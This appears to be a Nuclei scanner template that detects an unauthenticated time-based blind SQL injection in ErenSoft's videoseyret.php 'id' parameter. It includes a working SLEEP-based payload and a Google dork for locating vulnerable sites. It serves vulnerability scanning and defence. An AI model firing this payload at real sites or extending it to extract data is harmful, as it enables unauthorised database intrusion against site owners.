id: erensoft-sqli

info:
  name: ErenSoft - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
  reference:
    - https://cxsecurity.com/issue/WLB-2023070055
  metadata:
    verified: true
    max-request: 1
    google-query: intext:"Kodlama:Erensoft"
  tags: sqli,unauth,erensoft

http:
  - raw:
      - |
        @timeout: 20s
        GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration >= 6
          - status_code == 200
          - contains(content_type, "text/html") && contains(body, "videoseyret")
        condition: and

      - type: word
        words:
          - class="entry-title"
# digest: 4a0a00473045022032a63f2ba11f9060654965df438b1ef8d5740e152c43bcedc4f1ca3fe2360602022100d379a4bd5708b439f7d985da64ed320417b700426cd8d2f05ed0fd52f4533dd4:922c64590222798bb761d5b6d8e72950